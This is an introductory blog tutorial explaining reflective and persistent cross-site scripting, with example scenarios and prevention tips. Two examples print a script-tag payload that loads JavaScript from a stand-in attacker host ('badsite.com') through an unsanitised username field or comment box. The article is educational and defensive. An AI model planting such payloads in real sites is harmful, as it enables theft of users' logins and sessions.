What is Cross Site Scripting (XSS)

Published Jan 15, 2016Last updated Mar 29, 2017
What is Cross Site Scripting (XSS)

XSS occurs when user input is processed without being sanitized. The victim is the user and not the system but what exactly is Cross Site Scripting? This article serves as a quick intro to commonly-used XSS attacks and how to prevent them.

Reflective XSS

Reflective XSS is the most frequent type of attack existing today. It involves a hacker dangling a piece of clickbait in front of a user to try and get them to click. This is usually a link in an email.

Example 1 – Reflective XSS

A site has a search field that doesn’t sanitise input. A hacker enters the following query:


This query then goes into the sites backend. It may not cause any harm but if an administrator on the backend gets curious and clicks on the link then a URL will open that appends the administrators cookies onto the URL.

This could expose the administrators session details to the hacker and give them access to the site’s backend.

Example 2 – Reflective XSS

A user gets an email that they think is from their bank. They click on a link that takes them to a site that looks identical to the banking site but with a slightly different URL.

The user inputs their details and clicks submit. This sends their details to the hacker. Smart hackers will even send a request to the real site and log them in and then redirect the user to the real site so the user has no idea that anything happened. This is a potent method of Cross Site Scripting (XSS).

Persistent XSS

Persistent XSS allows the attacker to insert a vulnerability that stays on the page until it is removed by an administrator. This allows the hacker to target a lot more victims. Typically the hacker will inject a script onto a page that is executed in the browser of every user who visits the page.

Example 3 – Persistent XSS

A social media site display’s each user's username at the top of every page. An attacker notices that this username is not sanitized before being displayed, so he signs up for a new account and instead of entering a username in the field, he puts in:

<script src="www.badsite.com/script.js"></script>

Now, whenever a user visits the hackers profile the script is automatically downloaded by them.

Example 4 – Persistent XSS

A site has a comments or review section that doesn’t filter the input before displaying the comment.

A user realises this and instead of entering a comment inserts:

<script src="www.badsite.com/script.js"></script>

Now every user that visits the page will download the file. This javascript can then redirect the user to a new Url or cover the entire page with an iframe that looks like the original site. The user will then try to log in and unknowingly send their login details to the hacker.


XSS can give a hacker access to user account credentials, browser history and even control the browser remotely.

What is Cross Site Scripting (XSS) Conclusion

  • Sanitise all input from user input fields.
  • HTML encode all dynamic content that is outputted to the browser so all dangerous characters are replaced with HTML entities.
  • Don’t click on links in suspect emails!

Apply these best practices and you will go some way preventing Cross Site Scripting (XSS) attacks and securing the front end of your applications. Mention in the comments if you found this post useful and follow the Leader Internet Blog for more quality advice tutorials like this.

Discover and read more posts from Paddy Sherry
get started